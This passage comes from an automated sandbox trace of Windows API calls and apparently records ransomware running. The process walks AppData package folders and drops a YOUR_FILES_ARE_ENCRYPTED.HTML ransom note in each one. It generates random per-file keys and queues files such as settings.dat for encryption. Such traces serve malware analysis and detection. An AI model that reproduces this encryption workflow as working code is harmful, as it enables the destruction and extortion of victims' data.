ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c2a33a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.915] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.915] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 195 [0120.915] GetProcessHeap () returned 0x600000 [0120.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\microsoft.xboxgamecallableui_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.927] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.928] CloseHandle (hObject=0x320) returned 1 [0120.928] GetProcessHeap () returned 0x600000 [0120.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.929] GetProcessHeap () returned 0x600000 [0120.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.929] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.929] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.929] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState") returned 104 [0120.929] GetProcessHeap () returned 0x600000 [0120.929] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.929] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState" [0120.929] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\*" [0120.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0120.929] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.929] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.929] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0120.929] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0120.929] GetProcessHeap () returned 0x600000 [0120.929] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.930] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.931] CloseHandle (hObject=0x320) returned 1 [0120.931] GetProcessHeap () returned 0x600000 [0120.931] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.931] GetProcessHeap () returned 0x600000 [0120.931] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.931] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be0462f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.931] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.931] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings") returned 100 [0120.931] GetProcessHeap () returned 0x600000 [0120.931] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.931] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings" [0120.931] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\*" [0120.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be0462f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x93b82c39, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.936] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be0462f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x93b82c39, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.936] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.936] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.936] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\roaming.lock") returned 113 [0120.936] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.936] lstrlenW (lpString=".lock") returned 5 [0120.936] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.936] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x93c418e8, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93c418e8, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.936] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.936] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat") returned 113 [0120.936] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.936] lstrlenW (lpString=".dat") returned 4 [0120.936] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.936] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0120.937] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.937] GetProcessHeap () returned 0x600000 [0120.937] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.940] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="C7") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="7F") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="3D") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="6E") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="FF") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="86") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="22") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="3E") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="BD") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="04") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="FA") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="2F") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="6B") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="D3") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="87") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="4B") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="6A") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="13") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="D1") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="A3") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F8") returned 2 [0120.940] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="C9") returned 2 [0120.940] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="06") returned 2 [0120.940] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="1A") returned 2 [0120.940] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="DA") returned 2 [0120.940] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A2") returned 2 [0120.940] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="D1") returned 2 [0120.940] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="BA") returned 2 [0120.940] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E4") returned 2 [0120.940] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="09") returned 2 [0120.940] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="EA") returned 2 [0120.940] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="40") returned 2 [0120.941] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat" [0120.941] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.941] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.941] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93b82c39, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93b82c39, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93b82c39, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0120.941] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.941] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 118 [0120.941] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0120.941] lstrlenW (lpString=".LOG1") returned 5 [0120.941] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0120.941] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93b82c39, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93b82c39, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93b82c39, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0120.941] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.941] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 118 [0120.941] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0120.941] lstrlenW (lpString=".LOG2") returned 5 [0120.941] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0120.941] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93b82c39, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93b82c39, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93b82c39, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0120.941] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.941] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0120.941] GetProcessHeap () returned 0x600000 [0120.941] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.943] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.944] CloseHandle (hObject=0x320) returned 1 [0120.944] GetProcessHeap () returned 0x600000 [0120.944] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.944] GetProcessHeap () returned 0x600000 [0120.944] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.944] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.944] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.944] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData") returned 105 [0120.944] GetProcessHeap () returned 0x600000 [0120.944] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.945] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData" [0120.945] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\*" [0120.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.945] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.945] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9be2a715, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9be2a715, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9be2a715, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.945] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.945] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: 